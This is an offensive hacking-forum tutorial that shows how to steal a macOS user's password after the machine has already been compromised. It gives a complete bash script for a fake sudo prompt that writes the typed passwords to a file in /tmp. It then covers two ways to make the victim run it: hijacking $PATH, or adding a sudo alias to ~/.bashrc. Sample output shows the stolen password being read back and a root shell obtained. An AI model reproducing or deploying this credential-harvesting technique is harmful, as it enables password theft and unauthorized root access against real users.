Spacecow's Stoned OSX Tips & Tricks II
Ghetto Privilege Escalation on OSX
In this tutorial we will be putting an OSX spin on the article Ghetto privilege escalation with bashrc (http://turbochaos.blogspot.ca/2013/11/ghetto-privilege-escalation-with-bashrc.html). For this scenario, we have comprimised an OSX host using an advanced version of our l337 .app backdoor (https://evilzone.org/high-quality-tutorials/ssosxtt-i-creating-a-simple-python-backdoor-app-for-osx/) and are now trying to gain higher privs by simply stealing the users password. In this case we know our target is a nerd (maybe he was tricked in to running the infected app by a belgian on IRC) and he will eventually run the sudo command in a terminal so that will be our target.
Building our fake psudo prompt:
We will start by getting the output of the sudo binary on OSX when we enter an invalid password.
$ sudo ls
Password:
Sorry, try again.
Password:
Sorry, try again.
Password:
Sorry, try again.
sudo: 3 incorrect password attempts
Now we will build a quick bash script to mimic this output. Our script will behave a little bit different then the script in the original article except that it will:
- Only execute once if the output file does not exist already.
- Fail 3 times to be certain its the right password.
- Exits with error code 1 on first run.
#!/bin/bash
TARGET="/tmp/$(whoami)-psudo"
if [ ! -f $TARGET ]; then
for n in 1 2 3; do
echo -n "Password:"
stty -echo
read password
stty echo
echo ""
echo "$(whoami):$password" >> $TARGET
sleep 1
echo "Sorry, try again." 1>&2
done
echo "sudo: 3 incorrect password attempts"
exit 1
fi
sudo $*
Execution Method 1: Abusing $PATH:
After writing/copying our script to the target system, we will first check the $PATH variable to see if it has been misconfigured in anyway.
$ which sudo
/usr/bin/sudo
$ echo "$PATH"
/Users/Spacecow/.dnx/runtimes/dnx-mono.1.0.0-beta4/bin:/Users/Spacecow/.rbenv/shims:/Users/Spacecow/.rbenv/bin:/usr/local/opt/nvm/v0.10.32/bin:/Users/Spacecow/.bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/lib/node_modules:/usr/local/go/bin
We can see that on my system there are multiple directories in my path before the location of my sudo binary and so we will attempt to move our script to one of these writable directories.
$ ls -ld /Users/Spacecow/.bin/
drwxr-xr-x 25 Spacecow staff 850 Dec 10 16:49 /Users/Spacecow/.bin
Now we simply rename our script to 'sudo', make it executable and wait for the user to run it.
$ ls -l /tmp/Spacecow-psudo
ls: /tmp/Spacecow-psudo: No such file or directory
$ sudo su
Password:
Sorry, try again.
Password:
Sorry, try again.
Password:
Sorry, try again.
sudo: 3 incorrect password attempts
$ cat /tmp/Spacecow-psudo
Spacecow:password
Spacecow:password
Spacecow:password
$ sudo su
Password:
# whoami
root
Execution Method 2: Writing to .bashrc:
If our initial check for a misconfigured $PATH yields no fruit, fear not, we can still resort to writing an alias entry in the users bashrc or zshrc. In this case our script is in /tmp/psudo.
$ echo 'alias sudo="/tmp/psudo"' >> ~/.bashrc
Conclusion:
Yet again this is a rather simple method of exploitation but will continue to be a viable attack vector for a while. Dont forget that most of this tutorial is a simple OSX implementation of the original article posted earlier so don't forget to go read it to get the most information out of this post.
Stay tuned for more related tutorials from our OSX series. Please let me know about any topics you would like covered in future tutorials, any comments/corrections you have or if you're a macfag interested in contributing to a tutorial.
Sincerely yours,
-Spacecow